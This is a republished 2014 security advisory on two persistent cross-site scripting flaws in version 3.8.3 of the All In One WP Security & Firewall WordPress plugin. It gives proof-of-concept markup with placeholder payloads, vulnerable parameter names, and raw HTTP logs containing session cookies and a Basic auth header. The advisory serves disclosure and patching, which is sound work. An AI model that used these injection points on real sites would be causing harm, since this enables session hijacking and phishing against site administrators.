Home / exploitsPDF  

WordPress All In One Security And Firewall 3.8.3 XSS

Posted on 30 September 2014

Document Title: =============== All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1325 Release Date: ============= 2014-09-29 Vulnerability Laboratory ID (VL-ID): ==================================== 1327 Common Vulnerability Scoring System: ==================================== 3.3 Product & Service Introduction: =============================== WordPress itself is a very secure platform. However, it helps to add some extra security and firewall to your site by using a security plugin that enforces a lot of good security practices. The All In One WordPress Security plugin will take your website security to a whole new level. This plugin is designed and written by experts and is easy to use and understand. It reduces security risk by checking for vulnerabilities, and by implementing and enforcing the latest recommended WordPress security practices and techniques. (Copy of the Vendor Homepage: https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered two persistent vulnerabilities in the official All in One Security & Firewall v3.8.3 Wordpress Plugin. Vulnerability Disclosure Timeline: ================================== 2014-09-29: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Github Product: All In One Security & Firewall - Wordpress Plugin 3.8.3 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Two POST inject web vulnerabilities has been discovered in the official All in One WP Security and Firewall v3.8.3 Plugin. The vulnerability allows remote attackers to inject own malicious script codes to the application-side of the vulnerable service. The first vulnerability is located in the 404 detection redirect url input field of the firewall detection 404 application module. Remote attackers are able to prepare malicious requests that inject own script codes to the application-side of the vulnerable service. The request method to inject is POST and the attack vector that exploits the issue location on the application-side (persistent). The attacker injects own script codes to the 404 detection redirect url input field and the execution occurs in the same section next to the input field context that gets displayed again. The second vulnerability is location in the file name error logs url input field of the FileSystem Components > Host System Logs module. Remote attackers are able to prepare malicious requests that inject own script codes to the applicaation-side of the vulnerable service. The request method to inject is POST and the attack vector that exploits the issue location on the application-side (persistent). The attacker injects own script codes to the file name error logs url input field and the execution occurs in the same section next to the input field context that gets displayed again. The security risk of the persistent POST inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2. Exploitation of the application-side web vulnerability requires no privileged web-application user account but low or medium user interaction. Successful exploitation of the vulnerability results in persistent phishing attacks, session hijacking, persistent external redirect to malicious sources and application-side manipulation of affected or connected module context. Request Method(s): [+] POST Vulnerable Module(s): [+] Firewall - Detection 404 [+] FileSystem Components > Host System Vulnerable Parameter(s): [+] 404 detection redirect url [+] file name error logs url Affected Module(s): [+] Firewall - Detection 404 [+] FileSystem Components > Host System Proof of Concept (PoC): ======================= 1.1 The first POST inject web vulnerability can be exploited by remote attackers without privileged application user account and with low or medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: Exploit (Firewall > Detection 404 > [404 Lockout Redirect URL] ) <tr valign="top"> <th scope="row">404 Lockout Redirect URL:</th> <td><input size="50" name="aiowps_404_lock_redirect_url" value="http://127.0.0.1" type="text"><"<img src=""x"">%20%20>"<%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!]>" /> <span class="description">A blocked visitor will be automatically redirected to this URL.</span> </td> </tr> </table> <input type="submit" name="aiowps_save_404_detect_options" value="Save Settings" class="button-primary" /> </form> </div></div> <div class="postbox"> <h3><label for="title">404 Event Logs</label></h3> <div class="inside"> <form id="tables-filter" method="post"> <!-- For plugins, we also need to ensure that the form posts back to our current page --> <input type="hidden" name="page" value="aiowpsec_firewall" /> <input type="hidden" name="tab" value="tab6" /> <!-- Now we can render the completed list table --> <input type="hidden" id="_wpnonce" name="_wpnonce" value="054474276c" /><input type="hidden" name="_wp_http_referer" value="/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6" /> <div class="tablenav top"> <div class="alignleft actions"> <select name='action'> <option value='-1' selected='selected'>Bulk Actions</option> <option value='delete'>Delete</option> </select> <input type="submit" name="" id="doaction" class="button action" value="Apply" onClick="return confirm("Are you sure you want to perform this bulk operation on the selected entries?")" /> </div> <div class='tablenav-pages no-pages'><span class="displaying-num">0 items</span> <span class='pagination-links'><a class='first-page disabled' title='Go to the first page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6'>«</a> <a class='prev-page disabled' title='Go to the previous page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=1'>‹</a> <span class="paging-input"><input class='current-page' title='Current page' type='text' name='paged' value='1' size='1' /> of <span class='total-pages'>0</span></span> <a class='next-page' title='Go to the next page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0'>›</a> <a class='last-page' title='Go to the last page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0'>»</a></span></div> <br class="clear" /> </div> --- PoC Session Logs [POST] (Firewall > 404 Detection) --- Status: 200[OK] POST http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[8095] Mime Type[text/html] Request Header: Host[www.vulnerability-db.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall] Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846] Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=] Connection[keep-alive] Response Header: Server[nginx] Date[Fri, 26 Sep 2014 17:40:21 GMT] Content-Type[text/html; charset=UTF-8] Content-Length[8095] Connection[keep-alive] Expires[Wed, 11 Jan 1984 05:00:00 GMT] Cache-Control[no-cache, must-revalidate, max-age=0] Pragma[no-cache] X-Frame-Options[SAMEORIGIN] X-Powered-By[PleskLin] Vary[Accept-Encoding] Content-Encoding[gzip] - Status: 200[OK] GET http://www.vulnerability-db.com/dev/wp-admin/%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!] Load Flags[LOAD_NORMAL] Größe des Inhalts[557] Mime Type[text/html] Request Header: Host[www.vulnerability-db.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[image/png,image/*;q=0.8,*/*;q=0.5] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6] Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846] Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=] Connection[keep-alive] Response Header: Server[nginx] Date[Fri, 26 Sep 2014 17:40:22 GMT] Content-Type[text/html] Content-Length[557] Connection[keep-alive] Last-Modified[Tue, 14 May 2013 13:05:17 GMT] Etag["4ea065b-3c6-4dcad48e5901e"] Accept-Ranges[bytes] Vary[Accept-Encoding] Content-Encoding[gzip] X-Powered-By[PleskLin] Reference(s): /wp-admin/admin.php?page=aiowpsec_firewall /wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6 /wp-admin/%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!] /wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0 1.2 The second POST inject web vulnerability can be exploited by remote attackers without privileged application user account and with low or medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: FileSystem Components > Host System Logs <div class="inside"> <p>Please click the button below to view the latest system logs:</p> <form action="" method="POST"> <input id="_wpnonce" name="_wpnonce" value="92d4aba49c" type="hidden"> <input name="_wp_http_referer" value="/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4" type="hidden"> <div>Enter System Log File Name: <input size="25" name="aiowps_system_log_file" value="error_log>\>"[PERSISTENT INJECTED SCRIPT CODE!] type="text">" /> <span class="description">Enter your system log file name. (Defaults to error_log)</span> </div> <div class="aio_spacer_15"></div> <input name="aiowps_search_error_files" value="View Latest System Logs" class="button-primary search-error-files" type="submit"> <span style="display: none;" class="aiowps_loading_1"> <img src="http://www.vulnerability-db.com/dev/wp-content/plugins/all-in-one-wp-security-and-firewall/images/loading.gif" alt=""> </span> </form> </div> --- PoC Session Logs [POST] --- Status: 200[OK] POST http://www.vulnerability-db.com/dev/wp-admin/admin-ajax.php Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[application/json] Request Header: Host[www.vulnerability-db.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[application/json, text/javascript, */*; q=0.01] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Content-Type[application/x-www-form-urlencoded; charset=UTF-8] X-Requested-With[XMLHttpRequest] Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4] Content-Length[109] Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846] Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=] Connection[keep-alive] Pragma[no-cache] Cache-Control[no-cache] POST-Daten: interval[60] _nonce[176fea481c] action[heartbeat] screen_id[wp-security_page_aiowpsec_filesystem] has_focus[false] Response Header: Server[nginx] Date[Fri, 26 Sep 2014 17:53:44 GMT] Content-Type[application/json; charset=UTF-8] Transfer-Encoding[chunked] Connection[keep-alive] X-Robots-Tag[noindex] x-content-type-options[nosniff] Expires[Wed, 11 Jan 1984 05:00:00 GMT] Cache-Control[no-cache, must-revalidate, max-age=0] Pragma[no-cache] X-Frame-Options[SAMEORIGIN] X-Powered-By[PleskLin] Status: 200[OK] GET http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[6136] Mime Type[text/html] Request Header: Host[www.vulnerability-db.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4] Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846] Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=] Connection[keep-alive] Response Header: Server[nginx] Date[Fri, 26 Sep 2014 17:53:54 GMT] Content-Type[text/html; charset=UTF-8] Content-Length[6136] Connection[keep-alive] Expires[Wed, 11 Jan 1984 05:00:00 GMT] Cache-Control[no-cache, must-revalidate, max-age=0] Pragma[no-cache] X-Frame-Options[SAMEORIGIN] X-Powered-By[PleskLin] Vary[Accept-Encoding] Content-Encoding[gzip] Reference(s): /wp-admin/admin-ajax.php /wp-admin/admin.php?page=aiowpsec_filesystem /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 /wp-content/plugins/all-in-one-wp-security-and-firewall/ /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse of the Enter System Log File Name input context in the file system security module. The second issue can be patched by a secure encode and parse of the 404 Lockout Redirect URL input context in the firewall 404 detection module. Restrit the input and handle malicious context with a own secure eception handling to prevent further POSt injection attacks. Security Risk: ============== The security risk of the POSt inject web vulnerabilities in the firewall module are estimated as medium. Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory [Evolution Security] -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com

 

TOP